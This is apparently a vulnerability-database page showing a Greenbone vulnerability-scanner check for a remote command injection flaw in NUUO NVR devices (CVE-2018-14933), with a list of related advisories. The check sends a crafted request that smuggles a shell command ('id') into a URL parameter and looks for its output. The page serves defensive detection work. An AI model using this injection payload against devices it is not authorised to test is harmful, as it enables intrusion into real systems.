| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit | 7 Feb 201900:00 | – | zdt | |
| CVE-2018-14933 | 4 Aug 201800:00 | – | attackerkb | |
| CVE-2018-14933 | 7 Feb 201905:01 | – | circl | |
| NUUO NVRmini Devices OS Command Injection Vulnerability | 18 Dec 202400:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 18 Dec 202412:00 | – | cisa | |
| CVE-2018-14933 | 4 Aug 201819:00 | – | cve | |
| CVE-2018-14933 | 4 Aug 201819:00 | – | cvelist | |
| NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) | 11 Feb 201900:00 | – | exploitdb | |
| NUUO NVRmini upgrade_handle.php Remote Command Execution | 6 Dec 201802:51 | – | metasploit | |
| NUUO NVRmini - Remote Command Execution | 7 Jul 202616:50 | – | nuclei |
# SPDX-FileCopyrightText: 2018 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:nuuo:nuuo";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.141350");
script_version("2025-02-27T08:17:42+0000");
script_tag(name:"last_modification", value:"2025-02-27 08:17:42 +0000 (Thu, 27 Feb 2025)");
script_tag(name:"creation_date", value:"2018-08-06 11:54:43 +0700 (Mon, 06 Aug 2018)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2025-02-06 15:30:19 +0000 (Thu, 06 Feb 2025)");
script_cve_id("CVE-2018-14933", "CVE-2018-15716");
script_tag(name:"qod_type", value:"exploit");
script_tag(name:"solution_type", value:"VendorFix");
script_name("NUUO NVR < 3.10.0 RCE Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2018 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_nuuo_devices_http_detect.nasl");
script_mandatory_keys("nuuo/device/http/detected");
script_require_ports("Services/www", 80);
script_tag(name:"summary", value:"NUUO NVR devices are prone to a remote code execution (RCE)
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"insight", value:"upgrade_handle.php on NUUO NVR allows remote command execution
(RCE).");
script_tag(name:"solution", value:"Update to version 3.10.0 or later.");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/45070/");
script_xref(name:"URL", value:"https://www.nuuo.com/NewsDetail.php?id=0425");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
exit(0);
url = "/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27";
req = http_get(port: port, item: url);
res = http_keepalive_send_recv(port: port, data: req);
if (res =~ 'uid=[0-9]+.*gid=[0-9]+') {
report = 'It was possible to execute the "id" command.\n\nResult:\n' +
egrep(pattern: 'uid=[0-9]+.*gid=[0-9]+', string: res);
security_message(port: port, data: report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation